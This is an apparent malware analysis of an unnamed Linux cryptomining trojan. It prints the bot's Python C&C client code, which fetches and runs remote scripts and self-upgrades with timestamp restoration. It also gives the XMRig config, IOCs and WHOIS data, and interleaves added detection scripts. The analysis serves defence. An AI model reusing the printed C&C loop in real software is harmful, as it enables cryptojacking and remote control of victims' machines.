Analysis of a Captured Unnamed Cryptomining Trojan (Monero) Sample

Trojan overview


Background


I ran into a cryptomining trojan for which a Google search turned up nothing, so for now I am calling it the "nameless miner". The mining program is the open-source XMRig (the compiled binary is named update). The whole control side relies on a single randomly named Python file.
rc.local contains /etc/update.

Sample files


A randomly named Python file plus a randomly named Python interpreter launcher, used to run its own Python script. The script talks to the C&C server to receive instructions, fetch a script, run it, and start mining.

Main malicious functionality of the Python script


Code fragment 1:


if __name__ == "__main__":
    daemonize()  # standard daemonize code, not worth detailing
    if not global_lock(VAR_LOCK):   # exclusive file lock so only one instance of the script runs; nothing notable either
        sys.exit(3)
    d = Schedule()  # the key part: a Schedule thread
    d.start()
    d.join()

Code fragment 2:


class Schedule(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
        self.inited = False
        self.time_alive = datetime.datetime.now()
        self.time_update = datetime.datetime.now()
        self.time_task = datetime.datetime.now()
        self.s = None
        self.sock_ref = 0
        self.list_records = []
        self.lock_records = thread.allocate_lock()
        self.select_host = ""
        self.select_port = ""

    def init(self):
        self.time_alive = datetime.datetime.now() + datetime.timedelta(minutes=1)
        # self.time_alive = datetime.datetime.now() + datetime.timedelta(seconds=3)
        self.time_task = datetime.datetime.now() + datetime.timedelta(minutes=1)
        self.time_update = datetime.datetime.now() + datetime.timedelta(minutes=10)
        self.inited = True
        pass

    def task_result(self, idx, result):
        data = {'msg': 'task', 'id': idx, 'result': base64.b64encode(result)}
        ops_send(self.s, data)
        self.socket_close()  # release sock

    def task_exec(self, task_id, script, sync, timeout=None):
        filename = gen_file_name()
        f = open(filename, 'w')
        f.write(script)
        f.write("\n")
        f.close()
        t = TaskExec(filename, sync, timeout, task_id)
        if sync:
            self.socket_connect()
            t.set_cb(self.task_result)
        t.run()
        time.sleep(0.5)
        try:
            os.unlink(filename)
        except:
            pass

    def socket_connect(self):
        if not self.s:
            self.s = sch_check_host()
            if not self.s:
                return None
        self.sock_ref += 1
        return self.s

    def socket_close(self):
        self.sock_ref -= 1
        if self.sock_ref == 0:
            self.s.close()
            self.s = None

    def alive(self):
        sock = self.socket_connect()
        if not sock:
            return
        data = {'msg': 'alive'}
        result = ops_send(sock, data)
        if not result:
            self.socket_close()
            return

        result, response = ops_recv(sock)
        if not result:
            self.socket_close()
            return
        self.socket_close()
        print response
        if type(response) is not dict:
            return
        if 'delay' in response.keys():
            self.time_alive = datetime.datetime.now() + datetime.timedelta(seconds=response['delay'])
        pass

    def update(self):
        sock = self.socket_connect()
        if not sock:
            return
        data = {'msg': 'update'}
        result = ops_send(sock, data)
        if not result:
            self.socket_close()
            return

        result, response = ops_recv(sock)
        if not result:
            self.socket_close()
            return
        self.socket_close()
        print response
        if type(response) is not dict:
            return
        if 'delay' in response.keys():
            self.time_update = datetime.datetime.now() + datetime.timedelta(seconds=response['delay'])
        if 'script' not in response.keys():
            return
        self_upgrade(response['script'])

    def task(self):
        sock = self.socket_connect()
        if not sock:
            return
        data = {'msg': 'task'}
        result = ops_send(sock, data)
        if not result:
            self.socket_close()
            return
        result, response = ops_recv(sock)
        if not result:
            self.socket_close()
            return
        self.socket_close()
        print response
        if type(response) is not dict:
            return

        if 'script' in response.keys():
            self.task_exec(response['id'], base64.b64decode(response['script']), response['sync'], response['timeout'])
        self.time_task = datetime.datetime.now() + datetime.timedelta(seconds=response['delay'])

    def run(self):
        while True:
            if not self.inited:
                self.init()
            cur_time = datetime.datetime.now()
            if cur_time > self.time_alive:
                try:
                    self.time_alive = datetime.datetime.now() + datetime.timedelta(seconds=60)
                    self.alive()
                except Exception, e:
                    pass
            if cur_time > self.time_update:
                try:
                    self.time_update = datetime.datetime.now() + datetime.timedelta(seconds=60)
                    self.update()
                except Exception, e:
                    pass
            if cur_time > self.time_task:
                try:
                    self.time_task = datetime.datetime.now() + datetime.timedelta(seconds=60)
                    self.task()
                except Exception, e:
                    pass
            # self.task_result()
            time.sleep(1)

As you can see, three functions actually communicate: alive(), update() and task(). They rely on two helpers, ops_send and ops_recv, which are both plain socket communication; self_upgrade implements self-update. self.task_exec() downloads the miner and its config file, runs them, and starts mining.

def self_upgrade(script):
    self_file = os.path.abspath(__file__)
    ftime = (os.path.getctime(self_file), os.path.getmtime(self_file))
    f = open(self_file, 'w')
    f.write(script)
    f.close()
    os.utime(self_file, ftime)
    subprocess.Popen("sh -c \"chmod +x %s;kill -9 %d;%s\"" % (self_file, os.getpid(), self_file), shell=True)
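The os.utime() call in self_upgrade() writes the old timestamps back after the file has been rewritten, so the script's mtime never reveals the update. os.utime() can only set atime and mtime; ctime (the inode change time) is set by the kernel on every metadata change and cannot be restored from user space, so a file whose ctime sits well after its mtime is a sign that its timestamps were put back. The following Python 3 script is an added example (not part of the sample or of this analysis); it reproduces only the timestamp handling of self_upgrade() on a temporary file and then checks the ctime/mtime gap. The tolerance value and the function names are my own choice.

```python
import os
import tempfile
import time

# Tolerance (seconds) between ctime and mtime before a file is flagged;
# this value is my own choice, not something from the sample.
CTIME_MTIME_TOLERANCE = 2.0

def looks_timestomped(path, tolerance=CTIME_MTIME_TOLERANCE):
    """Return True if the file's inode change time (ctime) is well after its
    modification time (mtime).

    os.utime() can rewrite atime and mtime, but ctime is set by the kernel
    on every metadata change and cannot be set from user space. A rewrite
    followed by os.utime(old_times) therefore leaves ctime >> mtime."""
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > tolerance

def restore_mtime_after_rewrite(path, new_content):
    """Reproduce only the timestamp handling of self_upgrade(): remember the
    old times, overwrite the file, put the old times back. Nothing is
    executed and no process is signalled."""
    old_times = (os.path.getatime(path), os.path.getmtime(path))
    with open(path, "w") as f:
        f.write(new_content)
    os.utime(path, old_times)

def demo():
    """Create a temp file with an mtime one hour in the past, rewrite it the
    way self_upgrade() does, and report whether the check catches it."""
    fd, path = tempfile.mkstemp(prefix="timestomp-demo-")
    os.close(fd)
    try:
        past = time.time() - 3600
        os.utime(path, (past, past))          # pretend the file is an hour old
        restore_mtime_after_rewrite(path, "# replacement body (constructed)\n")
        return looks_timestomped(path)        # expected: True
    finally:
        os.unlink(path)

def fresh_file_is_clean():
    """Control case: a file that was simply created has ctime == mtime."""
    fd, path = tempfile.mkstemp(prefix="timestomp-ctrl-")
    os.close(fd)
    try:
        return not looks_timestomped(path)    # expected: True
    finally:
        os.unlink(path)

if __name__ == "__main__":
    print("timestomped file flagged:", demo())
    print("fresh file passes:", fresh_file_is_clean())
```

The ctime semantics assumed here hold on Linux and other POSIX systems; on Windows os.stat().st_ctime is the creation time, so the check does not apply there. Running the same comparison over /etc, /tmp and the home directories of a suspect host is a cheap way to find scripts that were rewritten in place.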

Generated files


From the code you can see that it creates files under /tmp named sess_ followed by a random string, used to store the payload sent by the C&C server. You will also see many of these files with size 0; presumably the C&C does not send a payload every time.

VAR_LOC = "/tmp"
VAR_PFX = "sess_"
VAR_LOCK = '/tmp/.%s.lock' % VAR_SIGN

...

def gen_file_name(path=VAR_LOC, prefix=VAR_PFX, length=26):
    list_content = []
    name = ""
    charsets = [(97, 26), (48, 10)]
    for (start, count) in charsets:
        for i in range(0, count):
            list_content.append(chr(start + i))
    for i in range(0, length):
        name += str(list_content[random.randint(0, len(list_content) - 1)])
    index = random.randint(0, length - len(VAR_SIGN))
    # name[index:index+4] = "oops"
    name = name[:index] + VAR_SIGN + name[index + len(VAR_SIGN):]
    return os.path.join(path, prefix + name)
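Because gen_file_name() always draws 26 characters from [a-z0-9] and splices VAR_SIGN into them, the dropped files have a fixed shape that can be matched on disk. The snippet above does not show VAR_SIGN, but VAR_LOCK = '/tmp/.%s.lock' % VAR_SIGN together with the /tmp/.ops.lock indicator listed later in this analysis imply it is "ops"; the example below treats that as an assumption. This is an added Python 3 example, not the sample's code; the directory listing it checks is constructed.

```python
import os
import re

# Assumption: VAR_SIGN is "ops". The snippet above does not define it, but
# VAR_LOCK = '/tmp/.%s.lock' % VAR_SIGN and the /tmp/.ops.lock indicator
# listed later in this analysis point to that value.
VAR_SIGN = "ops"
VAR_PFX = "sess_"
NAME_LEN = 26          # length=26 in gen_file_name()

# gen_file_name() draws NAME_LEN chars from [a-z] and [0-9] and splices
# VAR_SIGN into them, so the basename is exactly prefix + 26 of [a-z0-9].
_NAME_RE = re.compile(r"^%s[a-z0-9]{%d}$" % (re.escape(VAR_PFX), NAME_LEN))

def is_dropper_name(basename):
    """True if basename has the shape gen_file_name() produces."""
    if not _NAME_RE.match(basename):
        return False
    return VAR_SIGN in basename[len(VAR_PFX):]

def lock_file_path():
    """The single-instance lock the script takes before starting."""
    return "/tmp/.%s.lock" % VAR_SIGN

def scan_listing(entries):
    """entries: iterable of (basename, size_bytes).
    Returns (matching_names, matching_names_with_size_zero); the empty ones
    are reported separately because the analysis saw many of them."""
    hits, empty = [], []
    for name, size in entries:
        if is_dropper_name(name):
            hits.append(name)
            if size == 0:
                empty.append(name)
    return hits, empty

def scan_directory(path="/tmp"):
    """Run the check against a real directory."""
    entries = []
    with os.scandir(path) as it:
        for e in it:
            if e.is_file(follow_symlinks=False):
                entries.append((e.name, e.stat(follow_symlinks=False).st_size))
    return scan_listing(entries)

# Constructed directory listing for the demonstration.
SAMPLE_LISTING = [
    ("sess_k3opsx9q2a7bzv81mcd4ftrh0e", 1337),   # right shape, contains sign: hit
    ("sess_q7w2e9r4t1y6u3i8o5p0abcops", 0),      # hit, and empty
    ("sess_a1b2c3d4e5f6g7h8i9j0k1l2m3", 0),      # right shape, no sign
    ("sess_k3opsx9q2a7bz", 40),                  # too short
    ("sess_K3OPSX9Q2A7BZV81MCD4FTRH0E", 12),     # upper case is never generated
    (".ops.lock", 0),                            # the lock file, not a payload
]

if __name__ == "__main__":
    hits, empty = scan_listing(SAMPLE_LISTING)
    print("payload files:", hits)
    print("of which empty:", empty)
    print("lock file to look for:", lock_file_path())
```

The random part is regenerated for every task, so the names themselves are not indicators; the shape (prefix, length, character set and the embedded sign) is what stays constant, and scan_directory("/tmp") applies it on a live host.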

Network communication behavior


A packet capture taken while the script was running matches the network communication seen in the code.
From the code and the observed traffic, the following IOCs can be obtained:

The mining configuration is all in config.json:


{
    "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
    "av": 0,                // algorithm variation, 0 auto select
    "background": true,    // true to run the miner in the background
    "colors": false,         // false to disable colored output
    "cpu-affinity": null,   // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
    "cpu-priority": null,   // set process priority (0 idle, 2 normal to 5 highest)
    "donate-level": 1,      // donate level, mininum 1%
    "log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
    "max-cpu-usage": 80,    // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
    "print-time": 30,       // print hashrate report every N seconds
    "retries": 500,           // number of times to retry before switch to backup server
    "retry-pause": 5,       // time to pause between retries
    "safe": false,          // true to safe adjust threads and av settings for current CPU
    "threads": null,        // number of miner threads
    "pools": [
        {
            "url": "pool.minexmr.com:443", // URL of mining server
            "user": "44HEguZchqb3NEPePEuJicYWMwhQTFhGPDx6HroGHy5j8ycaWb6DL8YY2djPySmfzQLwAYfg7y12F3AqLeUhSB4VCpXnWvm.3673782466",           // username for mining server
            "pass": "x",                     // password for mining server
            "keepalive": true,               // send keepalived for prevent timeout (need pool support)
            "nicehash": false,               // enable nicehash/xmrig-proxy support
            "variant": -1                    // algorithm PoW variant
        }
    ],
    "api": {
        "port": 0,                             // port for the miner API https://github.com/xmrig/xmrig/wiki/API
        "access-token": null,                  // access token for API
        "worker-id": null                      // custom worker-id for API
    }
}


Wallet: 44HEguZchqb3NEPePEuJicYWMwhQTFhGPDx6HroGHy5j8ycaWb6DL8YY2djPySmfzQLwAYfg7y12F3AqLeUhSB4VCpXnWvm.3673782466
Pool: pool.minexmr.com:443
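XMRig's config.json carries // comments, so json.loads() rejects it as-is; to pull the pool and wallet out of a config found on a host you first have to strip the comments without touching // inside string values. The Python 3 script below is an added example, not part of the sample or of XMRig; it embeds a trimmed copy of the config above as its sample input, extracts the pool URL and wallet from each pool entry, and checks them against the indicators from this analysis. The split of the user field at the first "." into address and suffix follows the sample's value; what the suffix means is pool-specific.

```python
import json

# Wallet and pool from the config.json above (taken from this analysis).
KNOWN_BAD_WALLETS = {
    "44HEguZchqb3NEPePEuJicYWMwhQTFhGPDx6HroGHy5j8ycaWb6DL8YY2djPySmfzQLwAYfg7y12F3AqLeUhSB4VCpXnWvm",
}
KNOWN_BAD_POOLS = {"pool.minexmr.com:443"}

def strip_json_comments(text):
    """Drop // line comments that are outside string literals, so that an
    XMRig-style config can be fed to json.loads()."""
    out = []
    in_str = escape = False
    i, n = 0, len(text)
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if escape:
                escape = False
            elif c == "\\":
                escape = True
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):
            while i < n and text[i] != "\n":   # skip to end of line
                i += 1
            continue
        else:
            out.append(c)
        i += 1
    return "".join(out)

def load_config(config_text):
    """Parse a commented config into a dict."""
    return json.loads(strip_json_comments(config_text))

def extract_mining_iocs(config_text):
    """Return one dict per pool entry: pool URL, wallet address, and the
    suffix after the first '.' in the user field (the sample carries one;
    its meaning is pool-specific)."""
    cfg = load_config(config_text)
    iocs = []
    for pool in cfg.get("pools", []):
        user = pool.get("user") or ""
        address, _, suffix = user.partition(".")
        iocs.append({"pool": pool.get("url"), "address": address, "suffix": suffix})
    return iocs

def match_known_bad(iocs):
    """Which extracted entries hit the wallet/pool indicators from this page."""
    return [e for e in iocs
            if e["address"] in KNOWN_BAD_WALLETS or e["pool"] in KNOWN_BAD_POOLS]

# Trimmed copy of the config.json shown above, kept with its // comments
# so the stripper is exercised.
SAMPLE_CONFIG = r'''{
    "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
    "background": true,     // true to run the miner in the background
    "log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
    "pools": [
        {
            "url": "pool.minexmr.com:443", // URL of mining server
            "user": "44HEguZchqb3NEPePEuJicYWMwhQTFhGPDx6HroGHy5j8ycaWb6DL8YY2djPySmfzQLwAYfg7y12F3AqLeUhSB4VCpXnWvm.3673782466", // username for mining server
            "pass": "x",                   // password for mining server
            "keepalive": true              // send keepalived for prevent timeout (need pool support)
        }
    ],
    "api": {
        "port": 0,                         // port for the miner API https://github.com/xmrig/xmrig/wiki/API
        "access-token": null               // access token for API
    }
}'''

if __name__ == "__main__":
    found = extract_mining_iocs(SAMPLE_CONFIG)
    for entry in found:
        print(entry)
    print("known-bad entries:", len(match_known_bad(found)))
```

The comment stripper tracks string state character by character rather than using a regex, because a URL such as the one in the "port" comment, or a "//" inside a pool URL, would otherwise be cut at the wrong place. Wallet address and pool host are the most stable indicators of a cryptominer: the binary name and the dropper hashes change, the payout address does not.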

IOC


File names


The .py file: search for it by the domain names it contains, since its name changes and its first line, #!/sbin/regdbdump, is a random path and name, so its hash is not consistent;
the file that launches the Python script: random name, hash below;
config.json: hash below;
/tmp/.ops.lock

File hashes


update
MD5: D8D311F7822DDAB5888A59313224E0A4
SHA1: 27752629A75588C029F1AF191AB40DC0ECAF9C64
Randomly named Python launcher file
MD5: 6078CE87E5E2A7448AC192E2AB1CA2DF
SHA1: 00E7805857F2C7A944B86CDF29C33D7022CDC7B8
config.json
MD5: 107E4289A3AA1E3F499E8629D2FB4612
SHA1: CB67E8E8C1A7660FF77F83E9B54679AEBC7C710B

IP addresses


167.88.176.177
103.224.81.48
103.19.3.166
118.193.149.7

Domains


kernelpatch.info
rhelupdate.info
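The file hashes, IPs and domains above can be checked mechanically. The Python 3 script below is an added example, not from the sample or from this analysis; it hashes file contents against the list, checks rc.local for the /etc/update persistence entry, and scans log lines for the C&C IPs and domains. The rc.local contents and the log lines are constructed for the demonstration.

```python
import hashlib
import re

# Indicators copied from the lists above (hex digests upper-case as listed).
IOC_HASHES = {
    "D8D311F7822DDAB5888A59313224E0A4": "update (XMRig) MD5",
    "27752629A75588C029F1AF191AB40DC0ECAF9C64": "update (XMRig) SHA1",
    "6078CE87E5E2A7448AC192E2AB1CA2DF": "python launcher MD5",
    "00E7805857F2C7A944B86CDF29C33D7022CDC7B8": "python launcher SHA1",
    "107E4289A3AA1E3F499E8629D2FB4612": "config.json MD5",
    "CB67E8E8C1A7660FF77F83E9B54679AEBC7C710B": "config.json SHA1",
}
IOC_IPS = {"167.88.176.177", "103.224.81.48", "103.19.3.166", "118.193.149.7"}
IOC_DOMAINS = {"kernelpatch.info", "rhelupdate.info"}
IOC_PATHS = ["/etc/update", "/tmp/.ops.lock"]

def digests(data):
    """MD5 and SHA1 of a byte string, upper-case hex like the listing."""
    return (hashlib.md5(data).hexdigest().upper(),
            hashlib.sha1(data).hexdigest().upper())

def match_file_bytes(data):
    """Labels of every listed hash that the content matches."""
    return [IOC_HASHES[h] for h in digests(data) if h in IOC_HASHES]

def match_file(path):
    """Same check against a file on disk."""
    with open(path, "rb") as f:
        return match_file_bytes(f.read())

def rc_local_persists(text):
    """True if a non-comment line of rc.local launches /etc/update."""
    for line in text.splitlines():
        s = line.strip()
        if s and not s.startswith("#") and "/etc/update" in s:
            return True
    return False

def host_indicators(existing_paths, rc_local_text):
    """Path and persistence findings for one host."""
    found = [p for p in IOC_PATHS if p in existing_paths]
    if rc_local_persists(rc_local_text):
        found.append("rc.local runs /etc/update")
    return found

_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def match_network_log(lines):
    """Scan log lines (DNS, connection or proxy logs) for the C&C IPs and
    domains. Returns [(line_number, indicator), ...] in line order."""
    hits = []
    for no, line in enumerate(lines, 1):
        for ip in _IPV4.findall(line):
            if ip in IOC_IPS:
                hits.append((no, ip))
        low = line.lower()
        for dom in sorted(IOC_DOMAINS):
            # whole-label match: allows www.kernelpatch.info, rejects xkernelpatch.info
            if re.search(r"(?<![\w-])" + re.escape(dom) + r"(?![\w-])", low):
                hits.append((no, dom))
    return hits

# Constructed inputs for the demonstration.
SAMPLE_RC_LOCAL = """#!/bin/sh -e
# rc.local (constructed)
/etc/update
exit 0
"""
SAMPLE_LOG = [
    "2018-07-03T11:00:01Z dns A kernelpatch.info client=10.0.0.12",
    "2018-07-03T11:00:02Z conn 10.0.0.12:51234 -> 167.88.176.177:443 tcp",
    "2018-07-03T11:00:03Z dns A mirror.example.org client=10.0.0.12",
    "2018-07-03T11:00:04Z conn 10.0.0.12:51235 -> 103.19.31.66:80 tcp",
]

if __name__ == "__main__":
    print("host:", host_indicators(["/etc/update", "/etc/rc.local"], SAMPLE_RC_LOCAL))
    print("network:", match_network_log(SAMPLE_LOG))
```

Hash matching only catches the exact update binary and config.json from this sample; the Python script itself cannot be matched this way because its shebang path is random, which is why the domain and wallet indicators matter more than the hashes for this family.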

WHOIS information


kernelpatch.info

% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org
% This query returned 1 object

refer:        whois.afilias.net

domain:       INFO

organisation: Afilias Limited
address:      Office 107
address:      3013 Lake Drive
address:      CityWest
address:      Dublin 24
address:      Ireland

contact:      administrative
name:         Ram Mohan
organisation: Afilias Limited
address:      C/O Afilias USA, Inc.
address:      300 Welsh Road, Building 3
address:      Suite 105
address:      Horsham Pennsylvania 19044
address:      United States
phone:        +1 215 706 5700
fax-no:       +1 215 706 5701
e-mail:       domainadmin@afilias.info

contact:      technical
name:         Howard Eland
organisation: Afilias Limited
address:      C/O Afilias USA, Inc.
address:      300 Welsh Road, Building 3
address:      Suite 105
address:      Horsham Pennsylvania 19044
address:      United States
phone:        +1 215 706 5700
fax-no:       +1 215 706 5701
e-mail:       domaintech@afilias.info

nserver:      A0.INFO.AFILIAS-NST.INFO 199.254.31.1 2001:500:19:0:0:0:0:1
nserver:      A2.INFO.AFILIAS-NST.INFO 199.249.113.1 2001:500:41:0:0:0:0:1
nserver:      B0.INFO.AFILIAS-NST.ORG 199.254.48.1 2001:500:1a:0:0:0:0:1
nserver:      B2.INFO.AFILIAS-NST.ORG 199.249.121.1 2001:500:49:0:0:0:0:1
nserver:      C0.INFO.AFILIAS-NST.INFO 199.254.49.1 2001:500:1b:0:0:0:0:1
nserver:      D0.INFO.AFILIAS-NST.ORG 199.254.50.1 2001:500:1c:0:0:0:0:1
ds-rdata:     8674 7 1 197789a2cbaba6fecd0b5ac88c5bc414ce1fc309
ds-rdata:     8674 7 2 ec9b6082b96b5f87143696f2b483acc9b2c433dce0c94e70f1ff5648ca18008b

whois:        whois.afilias.net

status:       ACTIVE
remarks:      Registration information: http://www.nic.info

created:      2001-06-26
changed:      2015-09-09
source:       IANA

Domain Name: KERNELPATCH.INFO
Registry Domain ID: D503300000103900891-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:13Z
Creation Date: 2018-05-31T02:26:13Z
Registry Expiry Date: 2019-05-31T02:26:13Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2018-07-03T11:51:08Z <<<

Domain Name: kernelpatch.info
Registry Domain ID: D503300000103900891-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:13Z
Creation Date: 2018-05-31T02:26:13Z
Registrar Registration Expiration Date: 2019-05-31T02:26:13Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR325615890
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 14455 N. Hayden Road
Registrant City: Scottsdale
Registrant State/Province: Arizona
Registrant Postal Code: 85260
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: kernelpatch.info@domainsbyproxy.com
Registry Admin ID: CR325615893
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 14455 N. Hayden Road
Admin City: Scottsdale
Admin State/Province: Arizona
Admin Postal Code: 85260
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: kernelpatch.info@domainsbyproxy.com
Registry Tech ID: CR325615892
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 14455 N. Hayden Road
Tech City: Scottsdale
Tech State/Province: Arizona
Tech Postal Code: 85260
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: kernelpatch.info@domainsbyproxy.com
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2018-07-03T11:00:00Z <<<

rhelupdate.info

% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org
% This query returned 1 object

refer:        whois.afilias.net

domain:       INFO

organisation: Afilias Limited
address:      Office 107
address:      3013 Lake Drive
address:      CityWest
address:      Dublin 24
address:      Ireland

contact:      administrative
name:         Ram Mohan
organisation: Afilias Limited
address:      C/O Afilias USA, Inc.
address:      300 Welsh Road, Building 3
address:      Suite 105
address:      Horsham Pennsylvania 19044
address:      United States
phone:        +1 215 706 5700
fax-no:       +1 215 706 5701
e-mail:       domainadmin@afilias.info

contact:      technical
name:         Howard Eland
organisation: Afilias Limited
address:      C/O Afilias USA, Inc.
address:      300 Welsh Road, Building 3
address:      Suite 105
address:      Horsham Pennsylvania 19044
address:      United States
phone:        +1 215 706 5700
fax-no:       +1 215 706 5701
e-mail:       domaintech@afilias.info

nserver:      A0.INFO.AFILIAS-NST.INFO 199.254.31.1 2001:500:19:0:0:0:0:1
nserver:      A2.INFO.AFILIAS-NST.INFO 199.249.113.1 2001:500:41:0:0:0:0:1
nserver:      B0.INFO.AFILIAS-NST.ORG 199.254.48.1 2001:500:1a:0:0:0:0:1
nserver:      B2.INFO.AFILIAS-NST.ORG 199.249.121.1 2001:500:49:0:0:0:0:1
nserver:      C0.INFO.AFILIAS-NST.INFO 199.254.49.1 2001:500:1b:0:0:0:0:1
nserver:      D0.INFO.AFILIAS-NST.ORG 199.254.50.1 2001:500:1c:0:0:0:0:1
ds-rdata:     8674 7 1 197789a2cbaba6fecd0b5ac88c5bc414ce1fc309
ds-rdata:     8674 7 2 ec9b6082b96b5f87143696f2b483acc9b2c433dce0c94e70f1ff5648ca18008b

whois:        whois.afilias.net

status:       ACTIVE
remarks:      Registration information: http://www.nic.info

created:      2001-06-26
changed:      2015-09-09
source:       IANA

Domain Name: RHELUPDATE.INFO
Registry Domain ID: D503300000103900892-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:14Z
Creation Date: 2018-05-31T02:26:13Z
Registry Expiry Date: 2019-05-31T02:26:13Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2018-07-03T11:53:34Z <<<

Domain Name: rhelupdate.info
Registry Domain ID: D503300000103900892-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:14Z
Creation Date: 2018-05-31T02:26:13Z
Registrar Registration Expiration Date: 2019-05-31T02:26:13Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR325615889
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 14455 N. Hayden Road
Registrant City: Scottsdale
Registrant State/Province: Arizona
Registrant Postal Code: 85260
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: rhelupdate.info@domainsbyproxy.com
Registry Admin ID: CR325615894
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 14455 N. Hayden Road
Admin City: Scottsdale
Admin State/Province: Arizona
Admin Postal Code: 85260
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: rhelupdate.info@domainsbyproxy.com
Registry Tech ID: CR325615891
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 14455 N. Hayden Road
Tech City: Scottsdale
Tech State/Province: Arizona
Tech Postal Code: 85260
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: rhelupdate.info@domainsbyproxy.com
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2018-07-03T11:00:00Z <<<